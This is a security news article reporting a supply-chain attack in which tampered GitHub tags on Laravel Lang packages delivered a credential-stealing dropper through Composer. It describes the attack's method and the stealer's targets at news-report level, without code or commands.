Skip to content

Laravel Lang Packages Hacked: Attackers Distribute Malware to Steal Credentials

The Bottom Line: Attackers compromised Laravel Lang packages by manipulating GitHub tags and distributed malware that steals credentials, cryptographic keys, cloud credentials, and browser data.

An attack on the Laravel Lang localization packages has exposed developers to significant risk. Attackers manipulated GitHub tags to distribute malicious code via Composer that steals credentials.

Security firms such as StepSecurity, Aikido Security, and Socket have warned of a sophisticated supply-chain attack. The attackers employed an unusual tactic: rather than publishing new malicious versions, they manipulated existing GitHub tags in four Laravel Lang repositories – laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and possibly laravel-lang/actions.

The attackers altered hundreds of historical tags to point to malicious commits in attacker-controlled forks. Approximately 233 versions across three repositories and possibly up to 700 historical versions in total were compromised. Developers who installed the packages via Composer unknowingly received malware code instead of legitimate releases.

The injected malware was hidden in a file named ‘src/helpers.php’, which was automatically loaded by Composer. This dropper program downloaded an additional payload from the command-and-control server flipboxstudio[.]info.

The subsequently loaded PHP program is a sophisticated, cross-platform credential stealer for Linux, macOS, and Windows. It steals cloud credentials, Kubernetes secrets, Vault tokens, Git credentials, CI/CD secrets, SSH keys, browser data, cryptocurrency wallets, password managers, and .env files. Using regular expressions, it extracts AWS keys, GitHub tokens, Slack secrets, Stripe API keys, database credentials, and cryptocurrency recovery phrases.

On Windows systems, the malware additionally unpacks a hidden program named ‘DebugElevator’, which exfiltrates browser data and encryption keys from Chrome, Brave, and Edge.

Share on: